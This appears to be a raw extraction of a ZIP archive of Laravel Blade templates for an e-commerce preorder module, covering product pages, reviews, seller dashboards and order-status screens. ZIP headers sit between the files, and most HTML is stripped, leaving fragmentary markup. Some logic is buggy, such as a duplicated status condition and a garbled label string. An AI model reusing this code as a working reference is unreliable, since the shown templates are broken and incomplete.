    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endif
    @if($order->refund_status == 0)
    @endif @if($order->refund_note != null)

    {{ $order->refund_note }}

    @endif
    @if($order->seller_refund_note)

    {{ $order->seller_refund_note }}

    @endif
    {{-- button --}} @if($order->refund_status == 2)
    @elseif($order->refund_status == 3)
    @elseif($order->refund_status == 1)
    @else
    @endif
    @endif @if($order->delivery_status ==2)
    {{ translate('Your Review') }}

    {{ translate('Your Reviews & Ratings') }}

    {{ $order->preorder_product?->rating }} {{ translate('out of 5.0') }}
    @php $total = 0; $total += $order->preorder_product?->preorderProductreviews->count(); @endphp {{ renderStarRating($order->preorder_product?->rating) }} ({{ $total }} {{ translate('reviews') }})
    {{translate('Review this product')}} {{translate('Share your experience with others')}}
    {{ translate('Rate this Product') }}
    @endif
    @include('preorder.frontend.order.right.payment_summary') @include('preorder.frontend.order.right.preorder_status') @include('preorder.frontend.order.right.order_summary')
    @endsection @section('modal') @if(Auth::check()) @include('frontend.partials.address.address_modal') @endif @endsection @section('script') @include('frontend.partials.address.address_js') @endsection PK�N]�g��++0views/preorder/frontend/place_preorder.blade.phpnu�[��� PK�N]֗2R��-views/preorder/frontend/product_box.blade.phpnu�[��� PK�N].R�((.views/preorder/frontend/product_box2.blade.phpnu�[���PK�N]�#G$.views/preorder/frontend/product_box3.blade.phpnu�[���PK�N] q��%%.views/preorder/frontend/product_box4.blade.phpnu�[���PK�N]`���?views/preorder/frontend/product_details/customization.blade.phpnu�[���

    {{translate('Customized packaging available')}}

    Min Order: {{$product->min_qty}}

    {{translate('For more customization details')}} {{translate('contact supplier')}}

    PK�N]49a�� � =views/preorder/frontend/product_details/description.blade.phpnu�[���
    description; ?>
    @if ($product->video_provider == 'youtube' && isset(explode('=', $product->video_link)[1])) @elseif ($product->video_provider == 'dailymotion' && isset(explode('video/', $product->video_link)[1])) @elseif ($product->video_provider == 'vimeo' && isset(explode('vimeo.com/', $product->video_link)[1])) @endif
    PK�N]s���9views/preorder/frontend/product_details/details.blade.phpnu�[���

    {{ $product->product_name }}

    {{ translate('Category') }} {{$product->category->name}}

    {{ translate('Preorder Received') }} {{$product->preorder->count()}}

    @if(get_setting('product_query_activation') == 1) @endif
    {{$product->is_available ? translate( 'Available Now ') : (strtotime($product->available_date) <= strtotime(date('Y-m-d')) ? translate( 'Available Now ') : translate('Available on ') .' '. $product->available_date .' '. (translate(' estimated')))}} @if($product->discount != null && $product->discount > 0 && $product->discount_start_date != null && (strtotime(date('d-m-Y')) > $product->discount_start_date || strtotime(date('d-m-Y')) < $product->discount_end_date)) {{ translate('Discount ')}} {{ $product->discount_type == 'flat' ? single_price($product->discount) : $product->discount.'%'}} @endif @if($product->is_prepayment) {{ translate('Prepayment Needed') }} @endif
    PK�N]dU�*j j Lviews/preorder/frontend/product_details/frequently_bought_products.blade.phpnu�[���

    {{ translate('Frequently Bought Products') }}

    PK�N]�@� Mviews/preorder/frontend/product_details/frequently_brought_products.blade.phpnu�[���

    {{ translate('Frequently Bought Products') }}

    PK�N]r�!~?views/preorder/frontend/product_details/image_gallery.blade.phpnu�[���
    @php $photos = $product->images != null ? explode(',', $product->images) : []; @endphp
    PK�N]3�k;views/preorder/frontend/product_details/lead_time.blade.phpnu�[���
    @foreach($product->preorder_wholesale_prices as $price) @endforeach @foreach($product->preorder_wholesale_prices as $price) @endforeach
    Quantity (Pieces){{$price->wholesale_min_qty}} - {{$price->wholesale_max_qty}}
    Lead Time (days){{$price->wholesale_lead_time}}

    * {{translate('Lead time is subjected to change anytime')}}

    PK�N]_eڢ##Cviews/preorder/frontend/product_details/preorder_products.blade.phpnu�[���

    {{ translate('More Products to Pre-order...') }}

    PK�N]:�1� � Aviews/preorder/frontend/product_details/product_queries.blade.phpnu�[���@if(get_setting('product_query_activation') == 1)

    {{ translate(' Ask To Seller ') }}

    @guest

    {{ translate('Login') }} {{ translate('or') }} {{ translate('Register ') }}{{ translate(' to submit your questions to seller') }}

    @endguest @auth
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @if(auth()->check()) @php $own_product_queries = $product->preorderProductQueries->where('customer_id', auth()->user()->id); @endphp @if ($own_product_queries->count() > 0)

    {{ translate('My Questions') }}

    @foreach ($own_product_queries as $product_query)
    {{ strip_tags($product_query->question) }}
    {{ $product_query->user->name }} {{ date('d-m-Y H:ia', strtotime($product_query->created_at)) }}
    {{ strip_tags($product_query->reply ? $product_query->reply : translate('Seller did not respond yet')) }}
    {{ $product_query->preorderProduct->user->user_type != 'seller' ? env('APP_NAME') : $product_query->preorderProduct->user->shop->name }} {{$product_query->reply ? date('d-m-Y H:ia', strtotime($product_query->updated_at)) : '' }}
    @endforeach
    @endif @endif @endauth
    @include('preorder.frontend.product_details.product_query_pagination')
    @endif PK�N]�<�Q Q Jviews/preorder/frontend/product_details/product_query_pagination.blade.phpnu�[���

    {{ translate('Other Questions') }}

    @forelse ($product_queries as $product_query)
    Q
    {{ strip_tags($product_query->question) }}
    {{ $product_query->user->name }} {{ date('d-m-Y H:ia', strtotime($product_query->created_at)) }}
    A
    {{ strip_tags($product_query->reply ? $product_query->reply : translate('Seller did not respond yet')) }}
    {{ $product_query->preorderProduct->user->name }} {{$product_query->reply ? date('d-m-Y H:ia', strtotime($product_query->created_at)) : ''}}
    @empty

    {{ translate('No questions asked yet') }}

    @endforelse
    {{ $product_queries->links() }}
    PK�N]����� � Aviews/preorder/frontend/product_details/product_reviews.blade.phpnu�[���

    {{ translate('Reviews & Ratings') }}

    {{ $product->rating }} {{ translate('out of 5.0') }}
    @php $total = 0; $total += $product->preorderProductreviews->count(); @endphp {{ renderStarRating($product->rating) }} ({{ $total }} {{ translate('reviews') }})
    {{translate('Review this product')}} {{translate('Share your experience with others')}}
    {{ translate('Rate this Product') }}
    @include('preorder.frontend.product_details.product_review_pagination')
    PK�N]�<�Kviews/preorder/frontend/product_details/product_review_pagination.blade.phpnu�[���
      @foreach ($reviews as $key => $review) @if ($review->user != null)
    • user->avatar_original != null) data-src="{{ uploaded_asset($review->user->avatar_original) }}" @else data-src="{{ static_asset('assets/img/placeholder.jpg') }}" @endif>

      {{ $review->user->name }}

      {{ date('d-m-Y', strtotime($review->created_at)) }}
      @for ($i = 0; $i < $review->rating; $i++) @endfor @for ($i = 0; $i < 5 - $review->rating; $i++) @endfor

      {{ $review->comment }}

      @if($review->photos != null) @foreach (explode(',', $review->photos) as $photo) @endforeach @endif
      @php $OrderDetail = get_order_details_by_review($review); @endphp @if ($OrderDetail && $OrderDetail->variation) {{ translate('Variation :') }} {{ $OrderDetail->variation }} @endif
    • @endif @endforeach
    @if (count($reviews) <= 0)
    {{ translate('There have been no reviews for this product yet.') }}
    @endif
    {{ $reviews->links() }}
    PK�N]W���  Bviews/preorder/frontend/product_details/related_products.blade.phpnu�[���

    {{ translate('Related Products') }}

    PK�N]�67s��=views/preorder/frontend/product_details/right/brand.blade.phpnu�[��� @if($product->brand->slug !== 'no_brand')
    {{translate('Brand')}} {{ $product->brand->name }}
    @endifPK�N]4�~;views/preorder/frontend/product_details/right/cod.blade.phpnu�[���
    @if($product->is_cod)

    {{translate('Cash on Delivery')}}

    {{translate('Cash on Delivery Available')}}

    @if($product->is_prepayment)

    {{translate('Prepayment needed for cash on delivery')}}

    {{translate('Pay only '. $product->preorder_prepayment?->prepayment_amount .' to avail Cash on Delivery')}}

    @endif

    {{ $product->preorder_cod?->note?->description }}

    @endif
    PK�N]���>views/preorder/frontend/product_details/right/coupon.blade.phpnu�[���

    {{translate('coupon')}}

    @if($product->user->shop) @endif
    @if(date('Y-m-d H:i:s', time()) < date('Y-m-d H:i:s', $product->preorder_coupon?->coupon_end_date))
    {{$product->preorder_coupon?->coupon_code}}
    @else
    {{translate('No Coupon Available')}}
    @endif
    @if(date('Y-m-d H:i:s', time()) < date('Y-m-d H:i:s', $product->preorder_coupon?->coupon_end_date))

    {{$product->preorder_coupon?->coupon_type == 'flat' ? single_price($product->preorder_coupon?->coupon_amount) : $product->preorder_coupon?->coupon_amount.'% '}} {{translate('Coupon discount on Preorder')}}

    @endif @if($product->preorder_prepayment?->prepayment_amount != null)

    {{translate('Pay only')}} {{single_price($product->preorder_prepayment?->prepayment_amount)}} {{translate('to ensure your order')}}

    @endif @if($product->is_cod)

    {{translate('Cash on delivery available')}}

    @endif
    @section('script') @endsection PK�N]<����;views/preorder/frontend/product_details/right/faq.blade.phpnu�[��� PK�N]o� CCDviews/preorder/frontend/product_details/right/icon_section.blade.phpnu�[���

    {{translate('Refund Protection')}}

    {{translate('Worldwide Delivery')}}

    {{translate('24 hour online')}}

    {{translate('Free Gift')}}

    {{translate('Quality Guaranteed')}}

    {{translate('Call Support')}}

    @if(get_setting('image_for_faq_advertisement'))
    @endifPK�N]i6I���Eviews/preorder/frontend/product_details/right/price_section.blade.phpnu�[���

    {{format_price(preorder_discount_price($product))}}

    {{translate('Regular price') .' '. format_price($product->unit_price)}}

    {{--

    {{translate('Minimum order quantity ') .' '. $product->min_qty}}

    --}}
    @if($product->is_prepayment)

    {{translate('Prepayment')}}

    @if($product->is_prepayment_nedded)

    {{translate('PrepaPrepayment needed for Cash on Deliveryyment')}}

    @endif

    {{format_price($product->preorder_prepayment?->prepayment_amount)}}

    @endif
    PK�N]�_���>views/preorder/frontend/product_details/right/refund.blade.phpnu�[���

    {{translate('refund')}}

    {{translate('Refund Available for this product')}}

    @if($product->preorder_refund?->note?->description != null && $product->preorder_refund->show_refund_note)

    {{ Str::limit($product->preorder_refund?->note?->description, 100) }} {{ $product->preorder_refund?->note?->description }} See More

    @endif
    PK�N]fZY�((>views/preorder/frontend/product_details/right/review.blade.phpnu�[���
    {{ $product->rating ?? 4.8}} {{ translate('out of 5.0') }}
    @php $total = 0; $total += $product->preorderProductreviews?->count(); @endphp {{ renderStarRating($product->rating) }} ({{ $total }} {{ translate('Reviews & Ratings') }})
    PK�N]Zq_'��@views/preorder/frontend/product_details/right/shipping.blade.phpnu�[���

    {{translate('Shipping')}}

    @if($product->preorder_shipping?->shipping_type == 'free')

    {{translate('Free Shipping')}}

    @endif
    @if($product->preorder_shipping?->show_shipping_time)

    {{translate('Estimated Shipping Time :')}} {{ $product->preorder_shipping->min_shipping_days }} - {{ $product->preorder_shipping->max_shipping_days }} {{translate('days')}}

    @endif @if($product->preorder_shipping?->note?->description != null && $product->preorder_shipping->show_shipping_note)

    {{ Str::limit($product->preorder_shipping?->note?->description, 100) }} {{ $product->preorder_shipping?->note?->description }} {{ translate('See More') }}

    @endif

    {{translate('Contact Us')}} for shipping time for larger orders.

    @if($product->is_cod)

    {{translate('Cash on Delivery')}}

    {{translate('Cash on Delivery Available')}}

    @if($product->is_prepayment)

    {{translate('Prepayment needed for cash on delivery')}}

    {{translate('Pay only')}} {{format_price($product->preorder_prepayment?->prepayment_amount)}} {{translate('to avail Cash on Delivery')}}

    @endif @if($product->preorder_cod?->note?->description != null && $product->preorder_cod?->show_cod_note)

    {{ Str::limit($product->preorder_cod?->note?->description, 100) }} {{ $product->preorder_cod?->note?->description }} {{ translate('See More') }}

    @endif
    @endif
    PK�N] H�!�!<views/preorder/frontend/product_details/right/shop.blade.phpnu�[���
    @if($product->user->user_type == 'seller')
    {{ $product->user->shop->name }}
    @if ($product->user->shop->verification_status == 1) {{translate('verified seller')}} @else {{translate('Not verified')}} @endif {{-- --}}

    @else
    {{translate('In House Product')}}
    {{ translate('Share') }}
    @endif
    PK�N]:jM�8views/preorder/frontend/product_details/sample.blade.phpnu�[���
    @if($product->is_sample_order)

    {{translate('Sample order is available for this product')}}

    @endif

    Maximum order quantity : 1 {{$product->unit}}

    Sample price : {{$product->preorder_sample_order?->sample_price}} /piece

    PK�N].�ᵆ � =views/preorder/frontend/product_details/seller_info.blade.phpnu�[���@if ($product->user->shop != null)
    {{ translate('Seller Details') }}
    @if ( get_setting('vendor_system_activation') == 1) @endif
    {{ renderStarRating($product->user->shop->rating) }}
    ({{ $product->user->shop->num_of_reviews }} {{ translate('customer reviews') }})

    {{translate('Why Choos Us!')}}

    Verified seller at {{env('APP_NAME')}}

    {{100}} + delivery

    Capable of wholesale production

    24/7 Support

    @if ($product->user->shop->facebook || $product->user->shop->google || $product->user->shop->twitter || $product->user->shop->youtube)
    @endif
    @endif PK�N]�PD�  =views/preorder/frontend/product_details/top_selling.blade.phpnu�[���

    {{ translate('Top Selling') }}

    PK�N]$&��} } Fviews/preorder/frontend/product_details/top_selling_products.blade.phpnu�[���
    {{ translate('Top Selling Products') }}
      @foreach (get_best_selling_products(6, $detailedProduct->user_id) as $key => $top_product)
    • {{ home_discounted_base_price($top_product) }} @if(home_price($top_product) != home_discounted_price($top_product)) {{ home_price($top_product) }} @endif
    • @endforeach
    PK�N]Т**1views/preorder/frontend/product_details.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta') @endsection @section('content')
    @include('preorder.frontend.product_details.image_gallery')
    @include('preorder.frontend.product_details.details') @include('preorder.frontend.product_details.right.price_section') {{-- preorder request --}} @include('preorder.frontend.place_preorder') @include('preorder.frontend.product_details.right.review')
    @include('preorder.frontend.product_details.description') @if($more_products !== null && count($more_products) > 0) @include('preorder.frontend.product_details.preorder_products') @endif
    @include('preorder.frontend.product_details.product_reviews') @if($fq_bought_products !== null && count($fq_bought_products) > 0) @include('preorder.frontend.product_details.frequently_bought_products') @endif @include('preorder.frontend.product_details.seller_info')
    @include('preorder.frontend.product_details.product_queries') @if( count(\App\Models\Product::inRandomOrder()->get()) > 0) @include('preorder.frontend.product_details.related_products') @endif @if( count(\App\Models\Product::inRandomOrder()->get()) > 0) @include('preorder.frontend.product_details.top_selling') @endif
    @if($product->is_coupon) @include('preorder.frontend.product_details.right.coupon') @endif @include('preorder.frontend.product_details.right.brand') @include('preorder.frontend.product_details.right.shop') @include('preorder.frontend.product_details.right.shipping') @if($product->is_refundable) @include('preorder.frontend.product_details.right.refund') @endif @include('preorder.frontend.product_details.right.icon_section') @include('preorder.frontend.product_details.right.faq')
    @endsection @section('modal') @include('modals.size_chart_show_modal') @endsection @section('script') @endsectionPK�N]'I�,����1views/preorder/frontend/product_listing.blade.phpnu�[���@extends('frontend.layouts.app') @if (isset($category_id)) @php $meta_title = $category->meta_title; $meta_description = $category->meta_description; @endphp @elseif (isset($brand_id)) @php $meta_title = get_single_brand($brand_id)->meta_title; $meta_description = get_single_brand($brand_id)->meta_description; @endphp @else @php $meta_title = get_setting('meta_title'); $meta_description = get_setting('meta_description'); @endphp @endif @section('meta_title'){{ $meta_title }}@stop @section('meta_description'){{ $meta_description }}@stop @section('meta') @endsection @section('content')
    @php $activeClasses = "bg-soft-dark mr-2 my-2 text-white"; $inActiveClasses = "preorder-border-dashed m-2 text-muted fw-600"; @endphp
    {{-- {{translate('General Products')}} {{translate('Preorder Products')}} --}}

    @if(isset($category_id)) {{ $category->getTranslation('name') }} @elseif(isset($query)) {{ translate('Search result for ') }}"{{ $query }}" @else {{ translate('All Products') }} @endif

    {{--

    {{$product_type == 'preorder_product' ? translate('Preorder Products') : translate('General Products')}}

    --}}
    @foreach ($products as $key => $product)
    @if($product_type == 'preorder_product') @include('preorder.frontend.product_box2',['product' => $product]) @else @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product]) @endif
    @endforeach
    {{-- {{ $products->appends(['general_product' => request('general_product')])->links() }} --}}
    {{--

    {{translate('Preorder Products')}}

    @foreach ($preorder_products as $key => $product)
    @include('preorder.frontend.product_box2',['product' => $product])
    @endforeach
    {{ $preorder_products->appends(['preorder_product' => request('preorder_product')])->links() }}
    --}}
    @endsection @section('script') @endsection PK�N]d ��� � 8views/preorder/seller/commission_history/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{translate('Preorder Commission History report')}}

    {{ translate('Commission History') }}
    @foreach ($commission_history as $key => $history) @endforeach
    # {{ translate('Order Code') }} {{ translate('Admin Commission') }} {{ translate('Earning') }} {{ translate('Created At') }}
    {{ ($key+1) }} {{ $history->preorder ? $history->preorder->order_code : translate('Order Not Found') }} {{ $history->admin_commission }} {{ $history->seller_earning }} {{ $history->created_at }}
    {{ $commission_history->appends(request()->input())->links() }}
    @endsection @section('script') @endsectionPK�N]LjU� � 3views/preorder/seller/conversations/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Conversations')}}
      @foreach ($conversations as $key => $conversation)
    • sender->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->sender->avatar_original) }}" @endif class="rounded-circle" onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      {{ $conversation->sender->name }}
      {{ date('h:i:m d-m-Y', strtotime($conversation->messages->last()->created_at)) }}
      {{ $conversation->title }} @if ($conversation->messages()->where('sender_id', '!=' , auth()->id())->whereReceiverViewed(0)->count() > 0) {{ translate('New') }} @endif

      {{ $conversation->messages->last()->message }}

    • @endforeach
    {{ $conversations->links() }}
    @endsection PK�N]���::2views/preorder/seller/conversations/show.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    #{{ $conversation->title.' ('.translate('Between').' '.$conversation->receiver?->name.' '.translate('and').' '.$conversation->sender?->name.')' }}
    {{ $conversation->preorderProduct->getTranslation('product_name') }}
    @include('preorder.common.messages', ['conversation', $conversation])
    @csrf

    @endsection @section('script') @endsection PK�N]��n�wSwS/views/preorder/seller/dashboard/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Total Preorder Products')}}

    {{ translate('Total product uploaded as preorder product') }}

    {{ $total_preorder_roducts }}

    {{ translate('View all products') }}

    {{ translate('Live Preorder Products')}}

    {{ translate('Preorder products currently available to order ') }}

    {{ $live_preorder_products }}

    {{ translate('View all live products') }}

    {{-- Delayed prepayment & Delayed Final Orders --}}

    {{translate('Delayed prepayment orders')}}

    {{ $delayed_prepayment_orders_count }}

    {{translate('Delayed Final Orders')}}

    {{ $delayed_final_orders_count }}

    {{-- Add New Preorder Product --}}
    {{-- Sales Stats --}}

    {{translate('Sales Stats')}}

    {{translate('All sales in pre order system')}}

    {{translate('Total sales')}}

    {{format_price($total_sales) }}

    {{translate('Sales this month')}}

    {{format_price($totalSalesThisMonth) }}

    {{-- Order status --}}

    {{translate('Order Status')}}

    {{translate('Order status represents the delivery and order status of your preorders.')}}

    {{ translate('In Shipping') }}

    {{$in_shipping_orders}}

    {{ translate('Delivered') }}

    {{$is_delivered_orders}}

    {{-- Preorder States --}}

    {{ translate('Preorder States') }}

    {{ translate('All states of the preorder system up-to final order. All the states here has multiple actions.') }}

    {{ translate('Preorder Requests') }}

    {{ translate('Customers applied for a preorder product') }}

    {{$preorder_request_count}}

    {{ translate('Accepted Requests') }}

    {{ translate('Requests accepted & order profile created') }}

    {{$accepted_request_count}}

    {{ translate('Prepayment Requests') }}

    {{ translate('Prepayment Requests for admin to verify') }}

    {{$prepayment_request_count}}

    {{ translate('Confirmed Prepayments') }}

    {{ translate('Prepayments accepted by admin') }}

    {{$confirmed_prepayment_request_count}}

    {{ translate('Final Preorders') }}

    {{ translate('Completed orders of preorder products') }}

    {{$final_preorder_request_count}}

    {{-- Preorder by Product --}}

    {{ translate('Preorder by Product')}}

    {{ translate('View preorders of the product and & order number') }}

    @foreach($preorderProducts as $row) @php $product = \App\Models\PreorderProduct::where('id', $row['id'])->first(); $product_url = route('preorder-product.details', $product->product_slug); @endphp @endforeach
    {{ translate('Product') }} {{ translate('Request') }} {{ translate('Prepayment') }} {{ translate('Final Order') }}
    {{ $product->preorder->where('preorder_request_status',1)->count() }} {{ $product->preorder->where('prepayment_confirm_status',1)->count() }} {{ $product->preorder->where('final_order_status',1)->count() }}
    @endsection @section('script') @include('backend.dashboard.dashboard_js') @endsectionPK�N]P$,�C�C,views/preorder/seller/orders/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content') @php $routeName = Route::currentRouteName(); @endphp
    @if (addon_is_activated('refund_request')) @endif @foreach ($orders as $key => $order) @if (addon_is_activated('refund_request')) @endif @endforeach
    {{ translate('Product/Quantity') }} {{ translate('Preorder Code').'/'.translate('Created') }} {{ translate('Price').'/'.translate('Prepayment') }} {{ translate('Customer') }} {{ translate('Status') }}{{ translate('Refund') }}{{ translate('options') }}
    {{ translate('category')}}
    {{ Str::limit($order->preorder_product->getTranslation('product_name'), 50, ' ...') }}
    {{ translate('QTY') }} : {{ $order->quantity }}
    {{ $order->order_code }} @if ($order->is_viewed == 0) {{ translate('New') }} @endif
    {{ translate('Created') }} : {{ $order->created_at }}
    {{ single_price($order->grand_total) }}/ {{ single_price($order->preorder_product->is_prepayment ? $order->preorder_product->preorder_prepayment?->prepayment_amount : 0)}} @if($order->user != null) {{ $order->user->name }}
    {{ $order->user->email ?? $order->user->phone }} @else {{ translate('Customer not found') }} @endif
    @if($order->refund_status == 2) {{ translate('Refunded')}} @elseif($order->delivery_status == 2) {{ translate('Delivered')}} @elseif($order->shipping_status == 2) {{ translate('In Shipping')}} @elseif($order->final_order_status == 1) {{ translate('Final Order Requested')}} @elseif($order->final_order_status == 2) {{ translate('Final Order Accepted')}} @elseif($order->final_order_status == 3) {{ translate('Final Order Cancelled')}} @elseif($order->prepayment_confirm_status == 1) {{ translate('Prepayment Requested')}} @elseif($order->prepayment_confirm_status == 2) {{ translate('Prepayment Accepted')}} @elseif($order->prepayment_confirm_status == 3) {{ translate('Prepayment Cancelled')}} @elseif($order->request_preorder_status == 1) {{ translate('Preorder Requested')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Accepted')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Cancelled')}} @endif @if($order->preorder_product->is_refundable == 1) {{ translate('Refundable')}} @else {{ translate('No Refund')}} @endif
    {{ $orders->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsectionPK�N]� ��t t +views/preorder/seller/orders/show.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Order') }} #{{$order?->order_code}}

    {{\Carbon\Carbon::parse($order->created_at)->format('d.m.Y')}} at {{\Carbon\Carbon::parse($order->created_at)->format(' h.i A')}}

    {{ translate('Seller') }} {{$order->preorder_product->user->shop != null ? $order->preorder_product->user->shop->name : translate('In-house Product')}}

    @php $removedXML = ' '; @endphp {!! str_replace($removedXML, '', QrCode::size(100)->generate($order->code ?? "JKHKJHJHJG65")) !!}

    {{ translate('Order Status') }}

    @if($order->delivery_status == 2) {{ translate('Delivered')}} @elseif($order->shipping_status == 2) {{ translate('In Shipping')}} @elseif($order->final_order_status == 1) {{ translate('Final Order Requested')}} @elseif($order->final_order_status == 2) {{ translate('Final Order Accepted')}} @elseif($order->final_order_status == 3) {{ translate('Final Order Cancelled')}} @elseif($order->prepayment_confirm_status == 1) {{ translate('Prepayment Requested')}} @elseif($order->prepayment_confirm_status == 2) {{ translate('Prepayment Accepted')}} @elseif($order->prepayment_confirm_status == 3) {{ translate('Prepayment Cancelled')}} @elseif($order->request_preorder_status == 1) {{ translate('Preorder Requested')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Accepted')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Cancelled')}} @endif

    {{ translate('Amount') }}

    {{format_price($order->subtotal)}}

    {{ translate('Prepay') }} {{format_price($order->prepayment)}}

    {{$order->user?->name}}

    {{$order->user?->email}}
    {{$order->user?->phone}}

    {{$order->address?->address}}

    {{ translate('customer') }}

    {{ translate('Product') }}

    {{$order->preorder_product->product_name}}

    {{ translate('Quantity') }}

    {{$order->quantity}} {{$order->preorder_product->unit}}

    {{ translate('Product Details') }}

    {{ translate('UNIT Price') }}

    {{format_price($order->preorder_product->unit_price)}}

    {{ translate('Price') }}

    {{format_price($order->subtotal)}}

    {{ translate('Request Preorder') }}

    {{$order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('d.m.Y \a\t h.i A') : ''}}

    @csrf @method('PUT')
    @if($order->request_note)

    {{translate('Notes')}}

    {{$order->request_note}}

    @endif @php $requestPreorderStatus = $order->request_preorder_status; @endphp @if(in_array($requestPreorderStatus, [2, 3]))
    @elseif($requestPreorderStatus == 1 )
    @else
    @endif
    @if($order->preorder_product->is_prepayment)
    {{ translate('Prepayment Request') }}

    {{ $order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('d.m.Y \a\t h.i A') : ''}}

    @csrf @method('PUT')

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    {{translate('Notes')}}

    {{$order->reference_no}}

    {{$order->confirm_note}}

    @if($order->prepayment_confirm_status == 1)
    @endif @if($order->prepayment_note)

    {{ $order->prepayment_note }}

    @endif
    {{-- button --}} @if($order->prepayment_confirm_status == 2 )
    @elseif($order->prepayment_confirm_status == 3 )
    @elseif($order->prepayment_confirm_status == 1 && $order->request_preorder_status == 2 )
    @else
    @endif
    @endif
    {{ translate('Final Preorder') }}

    {{$order->final_order_time != null ? \Carbon\Carbon::parse($order->final_order_time)->format('d.m.Y \a\t h.i A') : ''}}

    @csrf @method('PUT')
    @if($order->cod_for_final_order)

    {{translate('Payment Type')}}

    @else

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    @endif

    {{translate('Notes')}}

    @if($order->cod_for_final_order)

    {{translate('Cash on delivery')}}

    @else

    {{$order->final_payment_reference_no}}

    @endif

    {{$order->final_payment_confirm_note}}

    @if($order->final_order_status == 1)
    @endif @if($order->final_oder_note)

    {{ $order->final_oder_note }}

    @endif
    {{-- button --}} @if($order->final_order_status == 2 )
    @elseif($order->final_order_status == 3 )
    @elseif($order->final_order_status == 1 && ($order->prepayment_confirm_status == 2 ))
    @else
    @endif
    {{ translate('In Shipping') }}

    {{ $order->shipping_time != null ? \Carbon\Carbon::parse($order->shipping_time)->format('d.m.Y \a\t h.i A') : ''}}

    @csrf @method('PUT')
    @if(!in_array($order->shipping_status, [2, 3]))
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endif
    @if(!in_array($order->shipping_status, [2, 3]))
    @endif @if($order->shipping_note)

    {{ $order->shipping_note }}

    @endif
    {{-- button --}} @if($order->shipping_status == 2 )
    @elseif($order->shipping_status == 3 )
    @elseif($order->shipping_status == 0 && ($order->final_order_status == 2) )
    @else
    @endif
    {{ translate('Delivery') }}

    {{ $order->delivery_time != null ? \Carbon\Carbon::parse($order->delivery_time)->format('d.m.Y \a\t h.i A') : '' }}

    @csrf @method('PUT')
    @if($order->cod_for_final_order)

    {{translate('Payment Type')}}

    @else

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    @endif

    {{translate('Notes')}}

    @if($order->cod_for_final_order)

    {{translate('Cash on delivery')}}

    @else

    {{$order->final_payment_reference_no}}

    @endif

    {{$order->final_payment_confirm_note}}

    @if(!in_array($order->delivery_status, [2, 3]))
    @endif @if($order->delivery_note)

    {{ $order->delivery_note }}

    @endif
    {{-- button --}} @if($order->delivery_status == 2)
    @elseif($order->delivery_status == 3)
    @elseif($order->shipping_status == 2)
    @endif
    @if($order->preorder_product->is_refundable && $order->delivery_status==2)
    {{ translate('Refund') }} @if($order->refund_status == 2) {{ translate('Accepted')}} @elseif($order->refund_status == 3) {{ translate('Rejected')}} @endif

    {{ $order->refund_time != null ? \Carbon\Carbon::parse($order->refund_time)->format('d.m.Y \a\t h.i A') : '' }}

    @csrf @method('PUT')

    {{translate('Proof of refund')}}

    {{translate('Notes')}}

    {{$order->refund_note}}

    @if(!in_array($order->refund_status, [2, 3]))
    @endif @if($order->seller_refund_note)

    {{ $order->seller_refund_note }}

    @endif
    {{-- button --}} @if($order->refund_status == 2 )
    @elseif($order->refund_status == 3 )
    @elseif($order->refund_status == 1 && ($order->delivery_status == 2) )
    @else
    @endif
    @endif

    {{translate('Order Summary')}}

    @include('preorder.common.order.order_summary')

    {{translate('Preorder Status')}}

    {{translate('Requested Pre order')}} {{ $order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Pre order request accepted')}} {{$order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('H:i \h\r\s, j F, Y') : ''}}
    @if($order->preorder_product?->is_prepayment)
    {{translate('Pre-payment & confirmation')}} {{ $order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('H:i \h\r\s, j F, Y') : ''}}
    @endif
    {{translate('Pre-payment accepted & order confirmed')}} {{ $order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product is live')}}
    {{translate('Final order ')}} {{ $order->final_order_time != null ? \Carbon\Carbon::parse($order->final_order_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product In Shipping')}} {{ $order->shipping_time != null ? \Carbon\Carbon::parse($order->shipping_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product Delivered')}} {{ $order->delivery_time != null ? \Carbon\Carbon::parse($order->delivery_time)->format('H:i \h\r\s, j F, Y') : ''}}
    @endsection @section('modal') {{-- customer ban modal --}} {{-- customer suspicious modal --}} {{-- customer History modal --}} @include('preorder.common.models.seller_preorder_cormation') @endsection @section('script') @endsectionPK�N]yW����/views/preorder/seller/products/create.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp
    {{translate('Add New Product')}}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
